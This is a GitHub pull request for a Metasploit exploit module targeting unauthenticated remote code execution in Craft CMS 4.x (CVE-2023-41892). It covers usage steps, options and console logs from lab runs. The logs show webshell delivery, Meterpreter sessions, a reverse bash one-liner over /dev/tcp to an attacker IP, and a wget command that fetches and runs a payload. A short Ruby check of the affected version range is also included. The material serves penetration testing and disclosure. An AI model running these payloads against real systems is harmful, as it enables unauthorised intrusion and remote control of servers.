
Craft CMS unauthenticated RCE [CVE-2023-41892] #18612

Merged
merged 7 commits into from Dec 22, 2023



@h00die-gr3y h00die-gr3y commented Dec 10, 2023

This module exploits a Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS, which is a popular content management system. CraftCMS versions between 4.0.0-RC1 and 4.4.14 are affected by this vulnerability, allowing attackers to execute arbitrary code remotely and potentially compromising the security and integrity of the application.

The vulnerability occurs through PHP object creation in the \craft\controllers\ConditionsController class, which allows running arbitrary PHP code by escalating the object creation and calling some methods available in \GuzzleHttp\Psr7\FnStream.
Using this vulnerability in combination with the Imagick extension and MSL, which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, the performance of image processing tasks, and the writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class, delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.
For more information, please check this article on attackerkb.com.

Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating system as the user that the web services are running as (typically www-data).

Installation

To test this module, you will need a vulnerable CraftCMS application.

This module has been tested on:

  • CraftCMS 4.4.14 running on MacOS Docker Desktop based on a DDEV deployment.

Installation steps to install CraftCMS on MacOS using Docker Desktop and DDEV

  • Install Docker Desktop on your MacOS distribution.

  • Install DDEV.

  • Install CraftCMS following these installation steps.

  • NOTE: After step 2 (Scaffold the project from the official starter project), open composer.json to edit the CraftCMS version and set it to 4.4.14 or lower.

  • Run composer update to downgrade the CraftCMS version to a vulnerable version. See also these instructions.

  • Continue with step 3 and, after completion, you should be able to access your application using your site name (https://mysite.ddev.site).

  • To access your application from another host, you need to set up a tunnel; otherwise you can only access it from the local machine. You can follow these instructions.

You are now ready to test the module.

Verification Steps

  • Start msfconsole
  • use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
  • set rhosts <ip-target>
  • set rport 443
  • set lhost <ip-attacker>
  • set target <0=php, 1=Unix Command, 2=Linux Dropper>
  • exploit

You should get a shell or a Meterpreter session.

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > info

       Name: Craft CMS unauthenticated Remote Code Execution (RCE)
     Module: exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
   Platform: Unix, Linux, PHP
       Arch: cmd, php, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-09-13

Provided by:
  chybeta
  h00die-gr3y <h00die.gr3y@gmail.com>

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Craft CMS base url
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host
  WEBSHELL                    no        The name of the webshell with extension .php. Webshell name will be randomly generated if left unset

  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular
  content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability
  allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity
  of the application.

  The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class
  which allows to run arbitrary PHP code by escalating the object creation calling some methods available in
  `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which
  stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that
  facilitates the reading of images, performance of image processing tasks, and writing of results back
  to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the
  Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the
  malicious PHP code and gaining access to the system.

  Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain
  access to the underlying operating system as the user that the web services are running as (typically www-data).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-41892
  https://blog.calif.io/p/craftcms-rce
  https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
  https://github.com/advisories/GHSA-4w8r-3xrw-v25g
  https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892


View the full module info with the info -d command.

Options

WEBSHELL

You can use this option to set the filename of the webshell with extension .php, otherwise the name will be randomly generated.

COMMAND

This option lets the user choose the underlying PHP shell command function to be used for execution.
The choices are system(), passthru(), shell_exec() and exec(), and it defaults to passthru().
This option is only available when the selected target is either Unix Command or Linux Dropper.
For the native PHP target, the eval() function is used by default for native PHP code execution.

Scenarios

CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/CDfbvAnrZMH.php
[+] Deleted /tmp/php5M63PK
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:51044) at 2023-12-17 12:31:55 +0000

meterpreter > sysinfo
Computer    : craftcms-vuln-web
OS          : Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >

CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
target => 1
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /var/www/html/web/XGCuZFdoia.php
[+] Deleted /tmp/phpakTlmu
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:51101) at 2023-12-17 12:34:34 +0000

uname -a
Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 GNU/Linux
id
uid=501(www-data) gid=20(dialout) groups=20(dialout)

CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp

msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
target => 2
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/bzzA52uoIqWP
[*] Client 192.168.201.25 (Wget/1.21) requested /bzzA52uoIqWP
[*] Sending payload to 192.168.201.25 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/sFQEhvKKcl.php
[+] Deleted /tmp/phpeQPKpy
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:51122) at 2023-12-17 12:35:54 +0000
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.16.2
OS           : Debian 11.8 (Linux 6.4.16-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Limitations

Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory set by the upload_tmp_dir setting in the php.ini file (default /tmp). These files are cleaned up automatically, but in case of any failure, clean them manually; otherwise the next exploit session will fail by using an outdated MSL file. These files start with php and you can list them with the command ls php*.
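The affected range stated above (4.0.0-RC1 through 4.4.14 inclusive) is easy to get wrong when a pre-release tag is involved, since a naive string or Gem::Version comparison does not order "RC" against a final release the way Craft's tags do. The following is an added example, not code from the module or the PR, that implements the range check from a defender's side; the alpha < beta < RC < final ordering is an assumption about Craft's tagging scheme, not something the PR states.

```ruby
# Added example (not part of the Metasploit module or this PR): decide whether a
# Craft CMS version string falls inside the affected range stated in the PR,
# 4.0.0-RC1 through 4.4.14 inclusive. The pre-release ordering below
# (alpha < beta < RC < final) is an assumption about Craft's tagging scheme.

PRE_RANK = { 'alpha' => 0, 'beta' => 1, 'rc' => 2 }.freeze
FINAL_RANK = 3 # a final release sorts after every pre-release of the same number

# Turn "4.0.0-RC1" into a comparable array [4, 0, 0, 2, 1] and "4.4.14" into
# [4, 4, 14, 3, 0]; Ruby arrays compare element-wise with <=>.
def version_key(version)
  m = version.strip.match(/\A(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.?(\d*))?\z/)
  raise ArgumentError, "unrecognised version: #{version.inspect}" unless m

  core = m[1..3].map(&:to_i)
  if m[4]
    rank = PRE_RANK[m[4].downcase]
    raise ArgumentError, "unknown pre-release tag: #{m[4]}" unless rank

    core + [rank, m[5].to_i]
  else
    core + [FINAL_RANK, 0]
  end
end

# Bounds exactly as given in the PR description (both inclusive).
AFFECTED_MIN = version_key('4.0.0-RC1')
AFFECTED_MAX = version_key('4.4.14')

# True when the given Craft CMS version lies in the range the PR lists for
# CVE-2023-41892; versions outside the range (including 3.x) return false.
def affected_by_cve_2023_41892?(version)
  key = version_key(version)
  (key <=> AFFECTED_MIN) >= 0 && (key <=> AFFECTED_MAX) <= 0
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample versions, not taken from any real deployment.
  %w[3.9.0 4.0.0-beta.1 4.0.0-RC1 4.0.0 4.4.14 4.4.15].each do |v|
    puts format('%-12s %s', v, affected_by_cve_2023_41892?(v) ? 'AFFECTED' : 'not affected')
  end
end
```

Feed it the version from your own deployment's composer.lock or the Craft admin panel; anything reported AFFECTED should be upgraded before relying on other mitigations.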

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:


@cdelafuente-r7 cdelafuente-r7 left a comment

Thanks @h00die-gr3y for updating this. I just left a few last comments and questions before it lands. I tested against CraftCMS version 4.4.14 and it works great.

@cdelafuente-r7

Thanks for updating this @h00die-gr3y ! Everything looks good to me now. I tested against CraftCMS version 4.4.14 and verified I got a session with all the targets. I'll go ahead and land it.

  • Example output:
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > run verbose=true rhosts=craftcms.ddev.site lhost=192.168.100.129

[*] Started reverse TCP handler on 192.168.100.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 172.20.0.2
[+] Deleted /var/www/html/web/vfqJzrPPq.php
[+] Deleted /tmp/phpdZCfDw
[*] Meterpreter session 1 opened (192.168.100.129:4444 -> 172.20.0.2:34108) at 2023-12-22 04:54:49 -0500

meterpreter > getuid 
Server username: n00tmeg
meterpreter > sysinfo 
Computer    : craftcms-web
OS          : Linux craftcms-web 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64
Meterpreter : php/linux
meterpreter > [*] Shutting down session: 1

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
target => 1
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > run verbose=true rhosts=craftcms.ddev.site lhost=192.168.100.129

[+] bash -c '0<&191-;exec 191<>/dev/tcp/192.168.100.129/4444;sh <&191 >&191 2>&191'
[*] Started reverse TCP handler on 192.168.100.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /var/www/html/web/yWjfqZIRZ.php
[+] Deleted /tmp/phpz2qfRv
[*] Command shell session 2 opened (192.168.100.129:4444 -> 172.20.0.2:45476) at 2023-12-22 04:55:49 -0500

uname -a
Linux craftcms-web 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux
id
uid=1001(n00tmeg) gid=1001(n00tmeg) groups=1001(n00tmeg)
exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
target => 2
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > run verbose=true rhosts=craftcms.ddev.site lhost=192.168.100.129

[*] Started reverse TCP handler on 192.168.100.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.129:8080/iYfmJKdF
[*] Generated command stager: ["wget -qO /tmp/vgoJzHOh http://192.168.100.129:8080/iYfmJKdF;chmod +x /tmp/vgoJzHOh;/tmp/vgoJzHOh;rm -f /tmp/vgoJzHOh"]
[*] Client 172.20.0.2 (Wget/1.21) requested /iYfmJKdF
[*] Sending payload to 172.20.0.2 (Wget/1.21)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.20.0.2
[+] Deleted /var/www/html/web/fdxQfMeBfFMN.php
[+] Deleted /tmp/phpS7nwHB
[*] Meterpreter session 3 opened (192.168.100.129:4444 -> 172.20.0.2:53312) at 2023-12-22 04:56:23 -0500
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > getuid 
Server username: n00tmeg
meterpreter > sysinfo 
Computer     : 172.20.0.2
OS           : Debian 11.8 (Linux 6.5.0-kali3-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Dec 22, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 3182cb4 into rapid7:master Dec 22, 2023
35 checks passed
@cdelafuente-r7

Release notes

This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.

@h00die-gr3y h00die-gr3y deleted the craftcms_unauth_rce branch December 23, 2023 09:25